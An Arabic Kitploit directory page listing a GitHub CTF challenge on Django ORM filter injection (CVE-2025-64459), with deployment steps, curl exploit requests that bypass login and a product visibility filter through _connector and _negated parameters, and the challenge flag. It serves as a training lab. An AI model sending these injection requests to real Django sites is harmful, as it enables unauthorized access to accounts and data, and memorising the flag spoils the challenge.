Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-64459 — # تحدي CTF يوضح حقن فلتر Django ORM (CVE-2025-64459) مع استغلال تجاوز المصادقة وتجاوز فلتر المنتجات، بما في ذلك النشر واسترجاع العلم. | Kitploit
أدوات/GitHubGitHub/z3yr0xx/cve-2025-64459
تحليل الثغرات الأمنيةاستغلال تطبيقات الويبأمن الويبCTFالتعلم والتعليممختبرات وتدريب عملي
GitHubz3yr0xx/cve-2025-64459

CVE-2025-64459

# تحدي CTF يوضح حقن فلتر Django ORM (CVE-2025-64459) مع استغلال تجاوز المصادقة وتجاوز فلتر المنتجات، بما في ذلك النشر واسترجاع العلم.

عرض المستودع
7منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تحدي CTF: حقن Django ORM (CVE-2025-64459)

التصنيف: أمان الويب
الصعوبة: متوسطة
الثغرة: CVE-2025-64459 - حقن فلتر Django ORM

📝 الوصف

لقد بنينا متجر بضائع آمن مع لوحة تحكم للمشرف. هل يمكنك تجاوز المصادقة والعثور على الملاحظة الإدارية الخاصة؟

الرابط: http://YOUR_SERVER:6008

🚀 النشر

cd web_django_cve
docker-compose up --build -d

🎯 الاستغلالات (CVE-2025-64459)

تجاوز المصادقة (/login/)

# Using _connector=OR
curl "http://HOST:8054/login/?username=admin&_connector=OR&is_superuser=True"

# Using _negated
curl "http://HOST:8054/login/?username=admin&_negated=True"

تجاوز فلتر المنتج (/)

# Negate is_public filter
curl "http://HOST:8054/?_negated=True"

# Direct access
curl "http://HOST:8054/?is_public=False"

🏁 العلم

lol-you-here_then-you_exploited_me

تنزيل الأداة